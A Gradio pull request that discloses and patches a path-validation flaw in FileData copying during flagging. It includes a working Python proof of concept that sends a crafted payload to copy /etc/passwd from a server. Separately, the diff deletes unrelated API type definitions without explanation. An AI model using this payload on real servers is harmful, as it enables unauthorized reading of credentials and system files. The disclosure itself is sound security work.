### PR TITLE
[BUG] Unauthorized File Exfiltration via FileData Path Manipulation

### DIFF
--- a/gradio/data_classes.py
+++ b/gradio/data_classes.py
@@ -19,7 +19,6 @@ from typing import (
 )
 
 from fastapi import Request
-from gradio_client.data_classes import ParameterInfo
 from gradio_client.documentation import document
 from gradio_client.utils import is_file_obj_with_meta, traverse
 from pydantic import (
@@ -291,13 +290,38 @@ class FileData(GradioModel):
             FileData: A new FileData object representing the copied file.
 
         Raises:
-            ValueError: If the source file path is not set.
+            ValueError: If the source file path is not set or outside allowed directories.
         """
         pathlib.Path(dir).mkdir(exist_ok=True)
         new_obj = dict(self)
 
         if not self.path:
             raise ValueError("Source file path is not set")
+
+        from gradio.utils import get_upload_folder, is_in_or_equal
+        import os
+
+        path_absolute = os.path.abspath(self.path)
+        allowed_dirs = []
+        
+        upload_folder = get_upload_folder()
+        allowed_dirs.append(upload_folder)
+        
+        from gradio.context import Context
+
+        if Context.root_block and hasattr(Context.root_block, "allowed_paths"):
+            allowed_dirs.extend(Context.root_block.allowed_paths)
+        
+        is_allowed = False
+        for allowed_dir in allowed_dirs:
+            if is_in_or_equal(path_absolute, allowed_dir):
+                is_allowed = True
+                break
+        
+        if not is_allowed:
+            raise ValueError(f"Security error: File path is outside allowed directories: {self.path}. Files must be within the Gradio upload directory or other explicitly allowed directories.")
+            
+        # Now it's safe to copy the file
         new_name = shutil.copy(self.path, dir)
         new_obj["path"] = new_name
         return self.__class__(**new_obj)
@@ -429,22 +453,3 @@ class ImageData(GradioModel):
 
 class Base64ImageData(GradioModel):
     url: str = Field(description="base64 encoded image")
-
-
-class APIReturnInfo(TypedDict):
-    label: str
-    type: dict[str, Any]
-    python_type: dict[str, str]
-    component: str
-
-
-class APIEndpointInfo(TypedDict):
-    description: NotRequired[str]
-    parameters: list[ParameterInfo]
-    returns: list[APIReturnInfo]
-    show_api: bool
-
-
-class APIInfo(TypedDict):
-    named_endpoints: dict[str, APIEndpointInfo]
-    unnamed_endpoints: dict[str, APIEndpointInfo]


### PR DESCRIPTION
Version: **5.25.2**

# Unauthorized File Exfiltration via FileData Path Manipulation

### Description
A vulnerability in Gradio's flagging feature exists that allows remote attackers to copy arbitrary files from the server's file system to a location under the application's control. The vulnerability stems from inadequate path validation in the file handling component of Gradio's flagging mechanism. This permits attackers to specify any readable file path on the system, rather than limiting access to only user-uploaded files. The exploitation requires no authentication if the Gradio application is publicly accessible, making this a severe security risk for all deployed Gradio applications with flagging enabled (the default configuration).

### Source - Sink Analysis
**Source**: User-controlled `path` parameter in the flagging functionality JSON payload  
**Sink**: `shutil.copy` operation in `FileData._copy_to_dir()` method

The vulnerable code flow:
1. A JSON payload is sent to the `/gradio_api/run/predict` endpoint
2. The `path` field within `FileData` object can reference any file on the system
3. When processing this request, the `Component.flag()` method creates a `GradioDataModel` object
4. The `FileData._copy_to_dir()` method uses this path without proper validation:

```python
def _copy_to_dir(self, dir: str) -> FileData:
    pathlib.Path(dir).mkdir(exist_ok=True)
    new_obj = dict(self)

    if not self.path:
        raise ValueError("Source file path is not set")
    new_name = shutil.copy(self.path, dir)  # vulnerable sink
    new_obj["path"] = new_name
    return self.__class__(**new_obj)
```
5. The lack of validation allows copying any file the Gradio process can read


### Proof of Concept
The following script demonstrates the vulnerability by copying `/etc/passwd` from the server to Gradio's flagged directory:


Setup a Gradio app:

```python
import gradio as gr

def image_classifier(inp):
    return {'cat': 0.2, 'dog': 0.8}

test = gr.Interface(fn=image_classifier, inputs="image", outputs="label")

test.launch(share=True)
```

Run the Proof of Concept:

```python
import requests

url = "https://[your-gradio-app-url]/gradio_api/run/predict"  
headers = {
    "Content-Type": "application/json",  
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" 
}

payload = {
    "data": [
        {
            "path": "/etc/passwd",  
            "url": "[your-gradio-app-url]",
            "orig_name": "network_config", 
            "size": 5000,  
            "mime_type": "text/plain", 
            "meta": {
                "_type": "gradio.FileData"  
            }
        },
        {}  
    ],
    "event_data": None,
    "fn_index": 4, 
    "trigger_id": 11, 
    "session_hash": "test123"  
}

response = requests.post(url, headers=headers, json=payload)
print(f"Status Code: {response.status_code}")
print(f"Response Body: {response.text}")
```

### Impact
The vulnerability has severe security implications:

- Attackers can access sensitive system files (`/etc/passwd`, `/etc/shadow`, etc.), configuration files containing credentials and API keys, database connection strings, and private SSH keys.
- Internal application details, proprietary code, and business logic can be exposed, leading to intellectual property theft.
- Information gathered through this vulnerability could facilitate further attacks by revealing user accounts, configuration details, and security implementations.
-  Attackers can exploit this vulnerability to target large system files (e.g., `/dev/zero` or `/dev/urandom`) or critical system files, potentially causing the application to crash or become unresponsive due to resource exhaustion.
-  If the application processes or stores sensitive user information, this vulnerability could lead to unauthorized access to this data, potentially violating data protection regulations.

### Contact
If you have any queries regarding this bug report, send an email to gecko@gecko.security.